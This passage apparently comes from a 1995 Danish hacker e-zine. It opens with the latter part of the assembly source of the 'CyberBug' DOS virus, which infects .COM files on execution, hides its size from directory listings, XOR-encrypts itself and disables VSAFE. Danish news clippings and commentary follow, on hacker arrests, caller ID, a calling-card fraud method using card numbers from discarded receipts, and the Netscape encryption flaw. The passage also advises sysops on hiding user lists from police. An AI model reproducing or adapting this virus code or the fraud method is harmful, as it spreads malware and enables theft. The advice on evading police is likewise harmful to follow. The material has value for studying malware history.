  1428.         jnz     error_stealth
  1429.  
  1430.         and     byte ptr es:[bx+17h],0e0h        ; substract virus len
  1431.         sub     es:[bx+1dh],(vir_size)
  1432.         sbb     es:[bx+1fh],ax                  
  1433.  
  1434. error_stealth:  pop     es bx ax
  1435.  
  1436. dir_error:      iret                                    
  1437.  
  1438. jmp_read_floppy:jmp     read_floppy
  1439.  
  1440. ;────────────────────────────────────────────────────────────────────────────
  1441. ; Check for every execution that is made look for .COM files
  1442. ;────────────────────────────────────────────────────────────────────────────
  1443.         
  1444. virusint21      proc    near
  1445.  
  1446.         cmp     ah,4bh                   ; Check for execution
  1447.         je      infectCOM
  1448.         
  1449.         cmp     ah,11h                   ; FCB find first
  1450.         je      FCB_stealth
  1451.         
  1452.         cmp     ah,12h                   ; FCB find next
  1453.         je      FCB_stealth
  1454.  
  1455.         cmp     ah,0eh                   ; Change Drive?
  1456.         je      jmp_read_floppy
  1457.  
  1458. virusint21      endp
  1459.  
  1460. function21:     jmp     dword ptr cs:[oldint21]
  1461.         iret
  1462.  
  1463. jmpforme:       jmp     popALL
  1464.  
  1465. ;────────────────────────────────────────────────────────────────────────────
  1466. ; Infection routine clear attributes, get time and write and encrypted copy
  1467. ;────────────────────────────────────────────────────────────────────────────
  1468.  
  1469. infectCOM:      push    ax bx cx dx bp si di ds es 
  1470.         
  1471. intercept24:    push    ds
  1472.         push    dx
  1473.  
  1474.         mov     ax,3524h
  1475.         int     21h
  1476.         mov     word ptr cs:[save_int24],bx
  1477.         mov     word ptr cs:[save_int24+2],es
  1478.                         
  1479.         push    cs
  1480.         pop     ds
  1481.         mov     dx,offset virusint24
  1482.         mov     ax,2524h
  1483.         int     21h
  1484.  
  1485.         pop     dx
  1486.         pop     ds 
  1487.         
  1488.         mov     ax,4300h                
  1489.         int     21h
  1490.  
  1491.         mov     word ptr cs:[save_attrib],cx
  1492.         jc      jmpforme
  1493.  
  1494.         mov     ax,4301h   
  1495.         xor     cx,cx
  1496.         int     21h
  1497.         
  1498.         mov     ax,3d02h
  1499.         int     21h
  1500.         
  1501.         push    ds
  1502.         push    dx
  1503.         push    cs
  1504.         pop     ds
  1505.         mov     bx,ax
  1506.         
  1507.         mov     ax,5700h
  1508.         int     21h
  1509.  
  1510.         mov     cs:[save_time],cx
  1511.         mov     cs:[save_date],dx
  1512.         
  1513.         mov     ah,3fh
  1514.         mov     dx,offset buffer
  1515.         mov     cx,3
  1516.         int     21h
  1517.         cmp     word ptr cs:[buffer],'ZM'  ; Check if EXE file
  1518.         je      close
  1519.  
  1520.         mov     ax,4202h                 ; move file pointer
  1521.         call    f_pointer
  1522.  
  1523.         sub     ax,offset codeend-offset start+3
  1524.         cmp     ax,word ptr cs:[buffer+1]
  1525.         je      close
  1526.         add     ax,offset codeend-offset start
  1527.         mov     word ptr cs:[new_jmp+1],ax
  1528.  
  1529. ;────────────────────────────────────────────────────────────────────────────
  1530. ; Get a random number from DOS time and use it as encryption key
  1531. ;────────────────────────────────────────────────────────────────────────────
  1532.         
  1533.         mov     ah,2ch                ;get random number from time
  1534.         int     21h
  1535.         mov     word ptr ds:[enc_value],dx    ;store it
  1536.         mov     ax,08d00h
  1537.         mov     es,ax
  1538.         mov     di,100h
  1539.         mov     si,di
  1540.         
  1541.         mov     cx,(vir_size+1)/2
  1542.         rep     movsw
  1543.         push    es
  1544.         pop     ds
  1545.         xor     bp,bp
  1546.         
  1547.         call    encrypt_decrypt            ;and encrypt
  1548.         
  1549.         mov     ah,40h                      ;write it to file
  1550.         mov     cx,vir_size
  1551.         mov     dx,offset start
  1552.         int     21h
  1553.  
  1554.         push    cs
  1555.         pop     ds
  1556.         
  1557.         jc      close
  1558.  
  1559.         mov     ax,4200h
  1560.         call    f_pointer
  1561.  
  1562.         mov     ah,40h
  1563.         mov     cl,3
  1564.         mov     dx,offset new_jmp
  1565.         int     21h
  1566.  
  1567. ;────────────────────────────────────────────────────────────────────────────
  1568. ; Save original time / date / attributes and close the file
  1569. ;────────────────────────────────────────────────────────────────────────────
  1570.  
  1571. close:          
  1572. stealth_marker: mov     ax,5701h
  1573.         mov     dx,cs:[save_date]
  1574.         mov     cx,cs:[save_time]
  1575.         and     cl,0e0h              ; stealth marker "value"
  1576.         inc     cl                          
  1577.         int     21h                         
  1578.         
  1579.         mov     ah,3eh               ; Close file
  1580.         int     21h
  1581.         pop     dx
  1582.         pop     ds
  1583.         
  1584.         mov     ax,4301h             ; restore old attrib
  1585.         mov     cx,word ptr cs:[save_attrib]
  1586.         int     21h
  1587.  
  1588.         push    ds                   ; restore int24
  1589.         pop     ds
  1590.         mov     ds,cs:[save_int24+2]
  1591.         mov     dx,cs:[save_int24]
  1592.         mov     ax,2524h
  1593.         int     21h
  1594.         
  1595. popALL:         pop     es ds di si bp dx cx bx ax
  1596.         jmp     function21
  1597.  
  1598. f_pointer:      cwd                              
  1599.         xor     cx,cx                    ; clear CX
  1600.         int     21h                      ; do it
  1601.         ret
  1602.  
  1603. ;────────────────────────────────────────────────────────────────────────────
  1604. ; Lets take down VSAFE from memory so it dosen't complain !!
  1605. ;────────────────────────────────────────────────────────────────────────────
  1606.                           
  1607. vsafe:          mov     ax,0fa01h 
  1608.         mov     dx,5945h  
  1609.         int     21h       
  1610.         ret
  1611.  
  1612. ;────────────────────────────────────────────────────────────────────────────
  1613. ; This is the part that drops a small BATCH file in current dir
  1614. ;────────────────────────────────────────────────────────────────────────────
  1615.         
  1616. drop_program:   lea     dx,[bp + offset filename] ; this creates our
  1617.                 push    ds                        ; little signature
  1618.         push    cs
  1619.         pop     ds
  1620.         mov     ah,3ch
  1621.         mov     cx,3
  1622.         int     21h
  1623.         jc      no_drop
  1624.  
  1625.         xchg    ax,bx
  1626.         mov     ah,40h
  1627.         mov     cx,(drop_end - drop_start)
  1628.         lea     dx,[bp + offset drop_start]
  1629.         int     21h
  1630.  
  1631.         mov     ah,3eh
  1632.         int     21h
  1633.  
  1634. no_drop:        pop     ds 
  1635.         ret
  1636.  
  1637. drop_start:        
  1638.  
  1639. evil            db      'echo > clock$',0 
  1640.  
  1641. drop_end:
  1642.  
  1643. virusname       db      '[ CyberBug v. 1.00 ]'
  1644. author          db      '[ made by TorNado DK ]'
  1645.  
  1646. filename        db      'Cyberbug.bat',0
  1647.  
  1648. save_time       dw      0
  1649. save_date       dw      0
  1650. save_attrib     dw      0
  1651.  
  1652. oldint21:       dd      ?
  1653.  
  1654. save_int24      dw      2 dup (?)
  1655.  
  1656. buffer          db      90h,0cdh,20h
  1657. new_jmp         db      0e9h,00h,00h
  1658.  
  1659. enc_end:
  1660.  
  1661. ;────────────────────────────────────────────────────────────────────────────
  1662. ; End of encryption the code below this point is unencrypted
  1663. ;────────────────────────────────────────────────────────────────────────────
  1664.  
  1665. enc_value       dw 0                 
  1666.  
  1667. encrypt_decrypt:mov     dx,word ptr ds:[bp+enc_value]
  1668.         lea     si,[bp+doit]
  1669.         mov     cx,(enc_end-doit)/2
  1670.  
  1671. xor_loop:       xor     word ptr ds:[si],dx         
  1672.         inc     si                          
  1673.         inc     si
  1674.         loop    xor_loop
  1675.         ret
  1676.  
  1677. codeend:         
  1678.  
  1679. cyberbug        ends
  1680. end             start
  1681.  
  1682.  
  1683.  
  1684.  
  1685.  
  1686.                 ■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■
  1687.  
  1688.  
  1689.  
  1690.  
  1691.  
  1692.          Nyheder (taget, stort set, fra den Danske dagspresse).
  1693.         Nyheder, informationer og andet godt, som man burde læse
  1694.  
  1695.  
  1696.  
  1697.  
  1698.  
  1699.                              HACKERE BUSTET
  1700.                             ----------------
  1701.                                - Darkseed
  1702.  
  1703. Pharzyde / 2nd2none (BudBreath/TRoSD) blev busted her forleden morgen, da
  1704. de havde hacket sig ind på AAU-Inet server, i l¢bet af de sidste måneder.
  1705. Politiet havde i nogle måneder aflyttet og log'et alle data-signaler over
  1706. telefonen.
  1707.  
  1708. Så klokken 7:30 den 22 marts (1995 selvf¢lgelig), bankede 3 politimænd pænt
  1709. på d¢ren og havde efter nogle timer konfiskeret alt hardware de overhovedet
  1710. kunne finde, inklusiv h¢jtalere og HIFI-Udstyr. Blandt hardwaren var flere
  1711. Gigabytes software, en del DAT-bånd og tonsvis af QIC-bånd. Men, det skal
  1712. dog siges at anklagerne mod BudBreath/TRoSD nok kun blive for hacking og
  1713. ikke for warez-aktiviteter.
  1714.  
  1715.  
  1716.  
  1717.  
  1718.  
  1719.                             HACKERE ANHOLDT
  1720.                            -----------------
  1721.                       Original Af: Bo Elkjær Olsen
  1722.                      [Ekstra-Bladet, 27 Marts 1995]
  1723.                                - Darkseed
  1724.  
  1725. Ny razzia mod danske hackere...
  1726.  
  1727.   Onsdag den 22. marts slog politiet igen til mod de danske hackere. Klokken
  1728. 7.30 om morgenen blev der banket på d¢rene hos tre hackere i K¢benhavn og
  1729. i Ålborg-området. De unge hackere blev taget med til forh¢r og deres værelser
  1730. grundigt ransaget. Alene hos den ene 'Pharzyde' fra Ålborg-området, blev
  1731. der konfiskeret edb-udstyr og programmer 'for over 70.000 kroner'.
  1732.   De tre anholdte hackere er under mistanke for at have hacket på Århus 
  1733. Universitets computere, hvorfra de er s¢gt ud på Internet.
  1734.   Hackerne har i tre måneder haft 'superbruger'-status - det vil sige fri
  1735. kontrol over universitets-computerne.
  1736.   - Jeg vidste ikke engang, at det var en superbruger-konto, fortæller
  1737. 'Pharzyde' til Ekstra Bladet.
  1738.   'Pharzydes' telefon er blevet aflyttet siden begyndelsen af februar, da
  1739. politiet kom på sporet af ham. Politiet er i stand til at aflytte datatrans-
  1740. missioner op til en hastighed på 14.400 baud, det vil sige bogstaver i 
  1741. sekundet.
  1742.   'Pharzyde' har kun brugt superbruger-kontoen til at komme ind på Internet, 
  1743. hvor han har hentet gratis programmer og spil.
  1744.   Det var ikke s¢ndag muligt at få en kommentar fra Århus Politi, der står for
  1745. anholdelserne.
  1746.  
  1747. UÆRLIGE HACKERE
  1748.  
  1749.   Sidste gang, politiet slog ned på den danske hackerscene, udviklede sagen
  1750. sig hurtigt til et mareridt for politiet. Hvad der skulle have været et hurtigt
  1751. kirurgisk snit ned gennem den elektroniske kriminalitet, udviklede sig til en
  1752. farce, hvor pressen var hurtigere orienteret om anholdelserne end politiet selv.
  1753.   I december 1993 indledte politiet den razzia, der kaldes Haslev-sagen.
  1754. Mens politiet forgæves fors¢gte at trævle hackmilj¢et op, tog hackerne deres
  1755. kendskab til medierne til hjælpe for at få nyheden ud hutigst muligt.
  1756.   Da den fjerde hacker, 'Wedlock', blev anholdt i Tårnby, var Ritzau så hutigt
  1757. orienteret, at Ritzau journalisten J¢rgen Juul om anholdelsen - på trods af,
  1758. at det var J¢rgen Juul, der havde bemyndiget den.
  1759.   Haslev-sagen er den hidtil st¢rste hackersag i Norden, og ikke mindst derfor
  1760. er politiet opsat på at få de anholdte d¢mt efter anklageskriftet. Efterforsk-
  1761. ningen bestående af kriminalfolk fra Roskilde, to mand fra politiets rejsehold
  1762. og tilkaldte, 'civile' edb-eksperter, arbejder på 16'ende måned med at gennem-
  1763. gå den datamængde der blev konfiskeret i forbindelse med anholdelserne. Det 
  1764. drejer sig om mere end en million tætskrevne A4-ark.
  1765.  
  1766. HACKER-POLITI
  1767.  
  1768.   Belært af erfaringerne nedsatte Politiets Efterretningstjeneste i efteråret
  1769. 1994 en specialgruppe, der skal tage sig af elektroniske kriminalitet.
  1770. Specialgruppen skal f¢rst og fremmest beskæftige sig med det offentliges
  1771. elektroniske sikkerhed, men kan også bistå kriminalpolitiet i efterforskning
  1772. af f.eks. hackersager.
  1773.   Om specialgruppen har været impliceret i de nye hacker-anholdelser vides ikke,
  1774. men 'det kunne ligne en pr¢veklud' siger Ekstra Bladets kilde i hackermilj¢et.
  1775.   Selv om der efterhånden har været en række st¢rre hackersager i Danmark,
  1776. er det stadig meget nemt at hacke.
  1777.   Efter anholdelserne i december 1993 og januar 1994 var der kortvarigt stille
  1778. om hackerne. I dag hackes der igen på fuld styrke herhjemme.
  1779.   På de forskellige edb-systemer bruges der stadig passwords, der er alt for
  1780. nemme at gætte.
  1781.   I den aktuelle sag på Århus Universitet var passwordet til superbruger-
  1782. kontoen, der giver ubegrænset kontrol over hele universitetscomputeren
  1783. '12345678'. Det svarer i datasikkerhed til at have en hovedd¢r - komplet med
  1784. Ruko-lås og hele marmeladen - og så en d¢rkarm af vådt toiletpapir.
  1785.   Selv om du bruger andre ord, er du stadig ikke garderet mod hackere. 
  1786. Hackerne har programmer , der kan k¢re tusindvis af ord, for eksempel hentet
  1787. fra WordPerfects ordbogsfunktion, igennem passwordcheck i l¢bet af ganske kort
  1788. tid. Derfor skal man ikke vælge passwords der består af almindelige ord, men 
  1789. sammensætte sit password af tilfældige bogstaver og tal, for eksempel
  1790. 'P8-træning' (potte-træning). Endelig skal man ikke bruge det samme password
  1791. på flere systeme.
  1792.  
  1793. ------------
  1794. Meget kan siges, men hvis det er rigtigt at Pharzyde ikke vidste, at han havde
  1795. en superbruger account, så har han fortjent at blive taget....
  1796. - Clive Sharp
  1797.  
  1798.  
  1799.  
  1800.  
  1801.  
  1802.          Råd til danske sysopper og brugerne af deres systemer
  1803.         -------------------------------------------------------
  1804.                      Indskrevet af en anonym person
  1805.                                - Darkseed
  1806.            
  1807. Da politiet har fulgt Pharzyde og andres linier DATA, og har haft mulighed
  1808. for at kunne se alt hvad han lavede på de forskellige boards, og af rent
  1809. sikkerheds mæssige grunde, vil jeg give dette råd til alle sysopper, og brugere
  1810. der har adresser/telefon numre liggende på sin harddisk. Krypter ALLE
  1811. filer der indeholder information, såsom adresser og navne på brugere af
  1812. de forskellige 'fy-fy' boards. Skriv telefon numrene og adresser fra
  1813. userlisterne ned i en anden fil (krypter den), og slet så de vitale
  1814. informationer fra userlisterne. 1 person kan hurtig blive skyld i en stor
  1815. mængde busts (nogen der ¢nsker det?), hvis han har sådanne informationer
  1816. liggende.
  1817.  
  1818. Boards Pharzyde har benyttes sig af de sidste par måneder, vil jeg råde til
  1819. at holde en mindre pause, og totalt udelukke 'ukendte' new users.
  1820.  
  1821. Der er ingen tvivl om at politiet vil efterforske NPD boards nærmere, som
  1822. de har set Pharzyde (m.fl.?) logge ind på. De userlister, en lille snot unge
  1823. kaldet Junker Jake, udgav for nogen tid siden, er der ingen tvivl om at
  1824. politiet har fået fat i (de har Pharzydes harddisk - Pharzyde havde
  1825. listerne)! Vær ekstra forsigtig, der er ingen grund til at flere boards
  1826. bliver lukket, og at flere bliver busted (vi b¢r ihvertfald undgå det så
  1827. godt som overhovedet muligt).
  1828.  
  1829. Brug Pretty Good Privacy [PGP] (af ældre dato. Versioner nyere end 2.3
  1830. har backdoors, og kan ikke stoles på).
  1831.  
  1832. Der er al mulig grund til ikke at f¢le sig for sikker!
  1833.  
  1834.  
  1835.  
  1836.  
  1837.  
  1838.                        Dansk PiratLinie Oprettet
  1839.                       ---------------------------
  1840.                                - Darkseed
  1841.                        Kilde: JP. Man 3. Apr 1995
  1842.  
  1843.    På bedste amerikanske vis får Danmark nu også et telefonnummer,
  1844. hvor ansatte i en virksomhed eller andre kan ringe op og angive en
  1845. arbejdsgiver, en tidligere kammerat eller en bekendt for at bruge
  1846. Pirat-kopieret software. Nummeret går under betegnelsen Piratlinien
  1847. og er oprettet af Business Software Alliance. Piratlinien vil i
  1848. Danmark bestå af en telefon, der er stillet op hos advokat
  1849. Niels M. Andersen hos advokatfirmaet Berning, Schlüter og Hald.
  1850. De er specialiseret i at jage softwarepirater ...
  1851.  
  1852. ---------
  1853. Jeg får snart store klodser af at h¢re om Schlüter og hans "anti-warez" venner.
  1854. Har den mand nogensinde udrettet noget seri¢st??? Har han nogensinde bustet
  1855. nogen for at have "pirat-warez"??? Manden er et fjols...
  1856. - Clive Sharp
  1857.  
  1858.  
  1859.  
  1860.  
  1861.  
  1862.                         Svære tider for hackerne
  1863.                Af Jan Carlsen, Institut for Datasikkerhed
  1864.           Kronikken i ComputerWorld nr. 29 - 1. September 1995
  1865.                              - Clive Sharp
  1866.  
  1867.  
  1868.         "Nu dages det br¢dre, det lysner i ¢st". Sådan lyder en gammel social-
  1869. demokratisk slagsang, som imidlertid også kan benyttes til andre ting. I denne
  1870. forbindelse som et glad budskab til de sikkerhedsfolk, der skal beskytte virk-
  1871. somhederne, blandt andet mod hackere.
  1872.         For der er hjælp på vej. Hjælpen tager fat om en af væsenligeste forud-
  1873. sætninger for at være hacker, nemlig anonymiteten. Uden at kunne være dækket af
  1874. en anonymitet er der ikke meget sjovt ved at hacke.
  1875.         Tænk om en hacker en sen aftentime sætter sig ved klaviaturet for et
  1876. par timers sjov, hvor vedkommende helt anonymt og naturligvis helt uskyldigt
  1877. roder lidt rundt i en af jeres vitale databaser, og derefter lader jer betale
  1878. regningen for videreopkald til jeres samarbejdspartner i USA, hvor han da lige
  1879. kan ændre et par ordre inden han fortsætter sin uskyldige fremfærd andetsteds
  1880. i verden. Alt i alt et spændende natteprogram, der nok skal kunne b¢de lidt på
  1881. manglen på kendskab til og omgang med det andet k¢n [man tror virkeligt at det
  1882. er l¢gn -red].
  1883.         Forstil dig så, at en halv time efter at han har startet sine krimin-
  1884. elle handlinger, så banker det på d¢ren og to grandvoksne politifolk anholder
  1885. ham og beslaglægger hans udstyr. Læg så hertil en straf (stor eller lille) som
  1886. han id¢mmes, samt et erstatningskrav fra den/de virksomheder, som han har været
  1887. inde hos, så kan man måske fornemme, at det sjove ved hacking er ved at forsvi-
  1888. nde.
  1889.         Dette har hidtil ikke kunnet lade sig g¢re, men med digitaliseringen af
  1890. centralerne er de tekniske muligheder kommet til stede. Imidlertid har
  1891. retsplejeloven sat en stopper for politiets efterforskning gennem aflytning
  1892. af telekommunikationen, idet der her kræves mistanke om en forbrydelse med en
  1893. straframme på minimum 6 år, f¢rend en dommer vil give tilladelse til en sådan
  1894. aflytning, og det er naturligvis normalt et godt stykker over den straf en
  1895. hacker kan forvente at få. Så hackeren har hidtil kunne tage det roligt, idet
  1896. reglerne om privatlivets fred overfor tredje part også har beskyttet disse
  1897. kriminelle. Anderledes er det imidlertid i forholdet mellem den, der ringer op
  1898. (B-nummeret) og den der ringes til (A-nummeret). Her er der i princippet ingen
  1899. tredje part, og der er ikke lovet noget om hemmeligholdelse overfor den der
  1900. ringes til. Hverken registerloven, retsplejeloven eller anden lovgivning/best-
  1901. emmelser forhindrer dette.
  1902.         Det er netop på dette punkt, at der nu g¢res noget for at fjerne anon-
  1903. ymiteten af den, der ringer. Det sker ved, at Tele-Danmark senere på året kom-
  1904. mer med en ny service, hvor B-nummeret kan aflæses af modtageren (A-nummeret).
  1905. Det betyder, at modtageren enten kan undlade at besvare opkaldet - eksempelvis
  1906. fordi modtageren ikke kender vedkommende eller netop kender vedkommende og ikke
  1907. ¢nsker at tale/kommunikere med denne - eller efterf¢lgende kan se, hvorfra det
  1908. påkaldende opkald kom.
  1909.         Indledningsvis vil der blive tilbudt en relativ simpel enhed til at
  1910. sætte på telefonlinien, som afsl¢rer nummeret, der kaldes fra. Sådanne enheder
  1911. kendes allerede idag, men de er baseret på, at den, der kalder selv skal ind-
  1912. taste sit telefonnummer - og det kan man af gode grunde ikke forvente af en
  1913. hacker, hvorfor afsendernummeret i fremtiden afsendes automatisk fra centralen.
  1914. Senere kommer der mere intelligente enheder, hvori blandt andet kan indkodes
  1915. positiv- og negativlister over hvilke numre, man ¢nsker/ikke ¢nsker at kommuni-
  1916. kere med. Endvidere arbejdes der på at få etableret en ordning, hvor abonenten
  1917. - eventuelt via sin skærm - kan gå ind og se en log over de opkald, der har
  1918. været. Envidere etableres der en særlig ordning for abonnenter med "hemmelige"
  1919. numre, med det skal siges, at selv hackere med "hemmeligt" telefonnummer ikke
  1920. skal regne med at komme langt i fremtiden.
  1921.         Selv om denne ordning ikke totalt vil afskaffe hacking, så er der dog
  1922. tale om et mile-skridt i den rigtige retning, og der er ingen tvivl om, at der
  1923. vil blive tale om væsentlige samfundsbesparelser, for ikke at forglemme en væs-
  1924. entlig bedre kommunikationssikkerhed i mange virksomheder, lettere mulighed for
  1925. at stoppe telefon-terror med mere.
  1926.         Bedst af alt er imidlertid, at ordningen også begrænser de unge menne-
  1927. skers mulighed for at blive så rutinerede hackere, at deres fremtidige l¢bebane
  1928. fastlåses til at være af kriminel art.
  1929. ----------
  1930. Jeg kunne komme med kritik af denne artikel fra Jan Carlsen, men det ville
  1931. fylde mere, end artiklen selv... Jeg har dog et sp¢rgsmål til Jan:
  1932. I USA har de haft disse funktioner i mange år, har det afskaffet hacking i USA?
  1933.  
  1934.  
  1935.  
  1936.  
  1937.  
  1938.            Hackere ringer verden rundt på andres Visa Dankort
  1939.                            Af Lisbeth Egeskov
  1940.            Forsiden på ComputerWorld nr. 27 - 18. August 1995
  1941.                              - Clive Sharp
  1942.  
  1943.         Nummeret på en betalingskortkvittering kan misbruges af enhver, der
  1944. samler bon'en op fra gulvet i forretningen, til at ringe verden rundt eller
  1945. k¢be ind på postordre.
  1946.         If¢lge Computerworlds oplysninger er det ved at vinde indpas i danske
  1947. hackerkredse at samle betalingskortkvitteringer op af papirkurven ved betaling-
  1948. steder og ad den vej finansiere behovet for lange udlandssamtaler.
  1949.         Når man betaler med eller hæver penge på sit kreditkort eller kombiner-
  1950. ede kreditkort/Dankort, står hele kortnummeret ofte på bon'en eller kviterin-
  1951. gen. Kortnummeret på kvitteringen fra et betalingskort er nok til at ringe gen-
  1952. nem det amerikanske telefonselskab AT&T's calling card servicenummer [som er
  1953. 80010010, hvis nogen er i tvivl -red]. Nummeret, der betjenes af en computer,
  1954. er en moderne udgave af Rigstelefonen. Fra det kan man ringe videre til hele
  1955. verden ved hjælp af et nummer på et kort fra de kendte, verdensdækkende kredit-
  1956. kort.
  1957.         Voice response-systemet hos AT&T oplyser, at man kan indtaste nummeret
  1958. på sit AT&T calling card eller "any major credit card". Stemmen beder også om
  1959. kortets udl¢bsdato, men acceptere gerne en fiktiv dato, viser en test af mulig-
  1960. hederne. At bede om udl¢bsdatoen, som normalt ikke står på kvitteringen, er
  1961. tilsyneladende ment som en sikkerhedsforanstaltning.
  1962.         Man kan misbruge både Eurocard og Visa Dankort. Ved en test lykkedes
  1963. det med det samme at komme igennem ved hjælp af kortnumre fra flere Eurocard
  1964. kvitteringer. Per Ladegaard, administrerende direkt¢r for Pengeinstitutternes
  1965. Betalinge Service, fortæller, at hans folk også kom igennem på Visa Dankort, da
  1966. de efter ComputerWorlds henvendelse afpr¢vede mulighederne.
  1967.         Hold ¢je med opkrævning. Fordi pinkoden på betalingskortet ikke indgår
  1968. i misbruget, kommer kortindehaveren ikke til at hænge på en ¢re af regningen.
  1969. Det står klart i betalingskortloven. - Men det kræver selvf¢lgeligt, at man op-
  1970. dager, at ens betalingskortnummer er blevet misbrugt af andre til for eksempel
  1971. at ringe verden rundt, siger kontorchef i Forbrugerstyrelsen, Frank Bjerg Mor-
  1972. tensen. - Man skal altid kontrollere opkrævningerne fra kortselskaberne. De er
  1973. en del af sikkerhedssystemet, siger Per Ladegaard, PBS. Det er PBS, der i Dan-
  1974. mark administrerer Eurocard og Visa Dankort.
  1975.         Selv om Forbrugerstyrelsen og PBS er enige om, at forbrugeren ikke hæf-
  1976. ter for misbrug, er de ikke enige om, hvem der så hænger på regningen. - Det er
  1977. kortudstederen, der hæfter. Det er denne ansvar, at kortnumre ikke kan mis-
  1978. bruges. For kortnumre er ikke hemmelige, og det må ikke komme brugeren til
  1979. skade at smide en kvittering i papirkurven, siger Frank Bjerg Mortensen.
  1980. - Problemet ligger ikke hos os, men hos AT&T. Det er dem, der er service-
  1981. udbyder. Deres kontrolsystem er tilsyneladende ikke godt nok, når det ikke af-
  1982. viser en falsk udl¢bsdato, siger Per Ladegaard. Han siger, at PBS vil tage
  1983. sagen op med AT&T via de internationale kanaler, men at det godt kan tage nogen
  1984. tid, f¢r problemet bliver l¢st. Det er ikke lykkedes at få en kommenter fra
  1985. AT&T.
  1986.         Problemet med misbrug af kreditkort er dog ikke så stort, som det
  1987. bliver gjort til, mener administrerende direkt¢r Per Ladegaard, PBS. - Vores
  1988. opg¢relser viser, at tendensen til tab på grund af misbrug både af Dankort og
  1989. kreditkort er faldende, siger Per Ladegaard, som understreger, at PBS ikke
  1990. slækker på sikkerheden af den grund.
  1991. --------------
  1992. AT&T havde samme service i slutningen af 1980'erne, og det voldte den så store
  1993. problemer, at de måtte lukke den service (til en vis grad), og så genåbner man
  1994. den service igen, UDEN at forbedre sin sikkerhed! Hvor smart er man så???
  1995.  
  1996.  
  1997.  
  1998.  
  1999.  
  2000.                        Se hackerens telefonnummer
  2001.                          Af Pia Lykke Andersen
  2002.                 ComputerWorld nr. 30 - 8. September 1995
  2003.                              - Clive Sharp
  2004.  
  2005.         I l¢bet af et halvt år vil TeleDanmark tilbyde de f¢rste kunder mulig-
  2006. heden for at se på telefonen, hvilket nummer der ringes fra.
  2007.  
  2008.         Mange edb-afdelinger har pr¢vet det: En hacker er i nattens l¢b trængt
  2009. ind i systemerne og har hentet informationer i virksomheden eller brugt tele-
  2010. fonsystemet til at ringe videre ud i verden. Til stor irritation for de fleste
  2011. der har haft ubudte gæster via telefonnettet, er det ikke muligt at få oplyst,
  2012. hvem der har ringet til virksomheden. L¢sningen hedder A-nummeroverf¢rsel, og
  2013. det kan i princippet godt lade sig g¢re. Flere at vore nabolande har inf¢rt
  2014. det, men det er ikke tilladt i Danmark. Men der er håb forude for edb-afdeli-
  2015. nger og andre der bliver udsat for ubehagelige opringninger. I nær fremtid
  2016. bliver de en bekymring mindre. En arbejdsgruppe i TeleDanmark unders¢ger i ¢je-
  2017. blikket, hvordan, og i hvilken takt, A-nummeroverf¢rsel kan indf¢res herhjemme.
  2018.  
  2019.         Centraler ændres.
  2020.         I l¢bet af det næste halve år, begynder TeleDanmark at tilbyde A-
  2021. nummeroverf¢rsel i en række testområder i Danmark. Den nye service bliver sand-
  2022. synligt lansdækkende i l¢bet af et par år. At A-nummeroverf¢rsel ikke er til-
  2023. ladt i Danmark skyldes hensynet til de abonnenter, som ¢nsker hemmeligt nummer.
  2024. Men ved fremtidens A-nummeroverf¢rsel vil de hemmelige telefonnumre kunne for-
  2025. blive hemmelige. Enten ved at software på den digitale telefoncentral registr-
  2026. erer, at det hemmeligt nummer ikke skal f¢res videre til modtageren af sam-
  2027. talen, eller ved, at den, der ringer op programmere sin telefon til ikke at op-
  2028. lyse, hvem man er. Tilsvarende kan modtageren af samtaler programmere sin tele-
  2029. fon til at afvise anonyme opkald. De digitale telefoncentraler er ikke program-
  2030. merede til A-nummeroverf¢rsel, men deres software kan konfigureres til den nye
  2031. service. Sandsynligvis bliver omkring 300.000 abonnenter, som h¢rer til på en
  2032. digital AXE-telefoncentral i S¢nderjylland og på Fyn, de f¢rste, der kan tage
  2033. A-nummeroverf¢rsel i brug. Endnu har ETSI (det europæiske telestandardiserings-
  2034. organ) ikke udsendt en international standard for overf¢rsel af A-numre i tele-
  2035. fonnettet, og den er heller ikke lige på trapperne. Derfor vælger operat¢rerne
  2036. selv, hvilken metode de finder bedst til den nye service. Den nye service
  2037. betyder også, at der vil komme nye telefoner på markedet. Når A-nummerover-
  2038. f¢rsel bliver aktuel i Danmark, vil TeleDanmark samtidigt markedsf¢re et disp-
  2039. lay, som kan kobles til telefonen. Det kan vise, hvor der ringes fra. Prisen
  2040. bliver sandsynligvis er par hundrede kroner.
  2041.  
  2042.         ISDN til ISDN.
  2043.         Enhver regel bekræftes som bekendt af undtagelsen. Også den om det
  2044. forbudte A-nummer. Danske abonnenter med ISDN-forbindelser kan nemmeligt aller-
  2045. ede se hinandens telefonnumre på telefonens display, hvis begge parter ¢nsker
  2046. det.
  2047.  
  2048.  
  2049.  
  2050.  
  2051.  
  2052.                         Sikkerhedshul i Netscape
  2053.                          Af Pia Lykke Andersen
  2054.                 ComputerWorld nr. 30 - 8. September 1995
  2055.  
  2056.         To studerende har gættet sig frem til krypteringskoden på Netscape, det
  2057. mest benyttede software til WWW på Internet.
  2058.  
  2059.         Sent s¢ndag aften sendte to californiske studerende, Ian goldberg og
  2060. David Wagner, en besked ud på Internet, som har vakt en del opsigt: På blot to
  2061. dage var det lykkedes dem at finde et svagt hul i Netscape og skrive software,
  2062. som på mindre end et minut g¢r det muligt at bryde krypteringskoden til Net-
  2063. scape.
  2064.  
  2065.         Sikkerheden på Netscape skabes ved brug af såkaldt symmetrisk n¢gle-
  2066. kryptografi. N¢glen består af en matematisk formel så lang, at den er umulig
  2067. for hackere at bryde. Men det tilfældige tal, som skaber den krypterede n¢gle,
  2068. var nemt for de to studerende at gætte sig frem til. - Netscapes software er
  2069. ikke så godt, som folk troede, hvilket sandsynligvis er værre, end ingen
  2070. sikkerhed, da folk får falsk tryghed, når de sender betalingsdetaljer over Int-
  2071. ernet, sagde Jan Goldberg tidligere på ugen til Wall Street Journal.
  2072.  
  2073.         If¢lge samme avis lykkedes samme man¢vre allerede for en måned siden
  2074. for en fransk studerende. Netscape Navigator er det mest brugte redskab til at
  2075. finde rundt på den grafiske del af Internet, World Wide Web, hvor man blandt
  2076. andet kan gå på indk¢b i virtuelle forretninger, og hvor man må opgive sit
  2077. kreditkortnummer for at få varen leveret. hidtil er det blevet betragtet som
  2078. ganske sikkert, at opgive kreditkortnumre og sende andre f¢lsomme oplysninger
  2079. over Internet [!!!].
  2080.  
  2081.         Hullet kan lappes.
  2082.         Netscape benyttes i dag af flere end otte milioner mennesker. At den
  2083. nyopdagede svaghed i Netscape Navigator faktisk er en realitet, bekræftes af
  2084. Netscape-selskabet. I en meddelelse på Internet forklarer firmaet selv pro-
  2085. blemet. - Netscape vil hurtigst muligt sende opdateret software på Internet,
